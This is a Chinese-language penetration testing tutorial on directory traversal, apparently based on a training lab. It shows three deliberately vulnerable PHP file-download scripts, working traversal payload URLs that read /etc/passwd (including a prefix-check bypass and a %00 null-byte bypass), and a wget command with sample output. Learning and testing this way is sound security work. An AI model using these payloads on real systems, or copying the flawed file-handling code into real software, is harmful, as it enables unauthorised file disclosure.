web渗透测试(9):目录遍历
目录遍历来自缺乏对应用程序作为路径一部分的信息的过滤/编码。
与其他漏洞一样,您可以使用“相同值的技术”来测试此类问题。例如,如果应用程序在参数内使用的路径是/images/photo.jpg。您可以尝试访问:
- /images/./photo.jpg:你应该看到同一个文件。
- /images/../photo.jpg:你应该得到一个错误。
- /images/../images/photo.jpg:你应该再次看到同一个文件。
- /images/../IMAGES/photo.jpg:你应该得到一个错误(取决于文件系统)或奇怪的事情。
如果您没有值images并且合法路径看起来像photo.jpg,则需要确定父存储库的内容。
测试完成后,您可以尝试检索其他文件。在Linux / Unix上,最常见的测试用例是/etc/passwd。您可以测试:images/../../../../../../../../../../../etc/passwd,如果您获得该passwd文件,则该应用程序易受攻击。好消息是你不需要知道它的数量../。如果你放太多,它仍然可以工作。
另一个有趣的事情是,如果在Windows中有目录遍历test/../../../file.txt,即使该目录test不存在,您也可以访问。在Linux上情况并非如此。在代码连接用户控制的数据以创建文件名的情况下,这非常有用。
例如,以下PHP代码应该添加参数id以获取文件名(example_1.txt例如)。在Linux上,如果没有目录example_,则无法利用此漏洞,而在Windows上,即使没有此类目录,您也可以利用它。
$file = "/var/files/example_".$_GET['id'].".txt";
在这些练习中,漏洞由<img标记内部使用的脚本说明。您需要阅读HTML源代码(或使用“复制图像URL”)来查找正确的链接,并开始利用该问题。
Example 1
<?php $UploadDir = '/var/www/files/'; if (!(isset($_GET['file']))) die(); $file = $_GET['file']; $path = $UploadDir . $file; if (!is_file($path)) die(); header('Cache-Control: must-revalidate, post-check=0, pre-check=0'); header('Cache-Control: public'); header('Content-Disposition: inline; filename="' . basename($path) . '";'); header('Content-Transfer-Encoding: binary'); header('Content-Length: ' . filesize($path)); $handle = fopen($path, 'rb'); do { $data = fread($handle, 8192); if (strlen($data) == 0) { break; } echo($data); } while (true); fclose($handle); exit(); ?>
第一个例子是一个非常简单的目录遍历。您只需要进入文件系统,然后返回,即可获得所需的任何文件。在这种情况下,您将受到文件系统权限的限制,例如,将无法访问/etc/shadow。
在此示例中,根据服务器发送的标头,您的浏览器将显示响应的内容。有时,服务器将使用标头发送响应Content-Disposition: attachment,并且您的浏览器不会直接显示该文件。您可以打开文件以查看内容。每种测试都需要一些时间。
使用windows系统,可以直接用浏览器访问:
192.168.1.11/dirtrav/example1.php?file=../../../../../../../etc/passwd
使用Linux / Unix系统,您可以通过以下方式更快地完成此操作wget:
% wget -O - 'http://192.168.40.130/dirtrav/example1.php?file=../../../../../../../etc/passwd' [...] daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh [...]
Example 2
<?php if (!(isset($_GET['file']))) die(); $file = $_GET['file']; if (!(strstr($file,"/var/www/files/"))) die(); if (!is_file($file)) die(); header('Cache-Control: must-revalidate, post-check=0, pre-check=0'); header('Cache-Control: public'); header('Content-Disposition: inline; filename="' . basename($file) . '";'); header('Content-Transfer-Encoding: binary'); header('Content-Length: ' . filesize($file)); $handle = fopen($file, 'rb'); do { $data = fread($handle, 8192); if (strlen($data) == 0) { break; } echo($data); } while (true); fclose($handle); exit(); ?>
在此示例中,您可以看到完整路径用于访问文件。但是,如果你试图用它替换它/etc/passwd,你将得不到任何东西。它看起来像是由PHP代码执行的简单检查。但是,您可以通过保留路径的开头并在末尾添加有效负载来绕过它,以便在文件系统中上下移动。例如:
http://192.168.1.11/dirtrav/example2.php?file=/var/www/files/../../../../../../../etc/passwd
Example 3
<?php $UploadDir = '/var/www/files/'; if (!(isset($_GET['file']))) die(); $file = $_GET['file']; $path = $UploadDir . $file.".png"; // Simulate null-byte issue that used to be in filesystem related functions in PHP $path = preg_replace('/\x00.*/',"",$path); if (!is_file($path)) die(); header('Cache-Control: must-revalidate, post-check=0, pre-check=0'); header('Cache-Control: public'); header('Content-Disposition: inline; filename="' . basename($path) . '";'); header('Content-Transfer-Encoding: binary'); header('Content-Length: ' . filesize($path)); $handle = fopen($path, 'rb'); do { $data = fread($handle, 8192); if (strlen($data) == 0) { break; } echo($data); } while (true); fclose($handle); exit(); ?>
当您利用目录遍历时,此示例基于一个常见问题:服务器端代码将自己的后缀添加到您的有效负载。通过使用NULL BYTE:空字节(您需要对其进行URL编码%00),可以轻松绕过此问题。使用NULL BYTE去除服务器端代码添加的任何后缀是一种常见的绕开方法,并且在Perl和旧版本的PHP中运行良好。例如:
http://192.168.1.11/dirtrav/example3.php?file=/../../../../../../../etc/passwd%00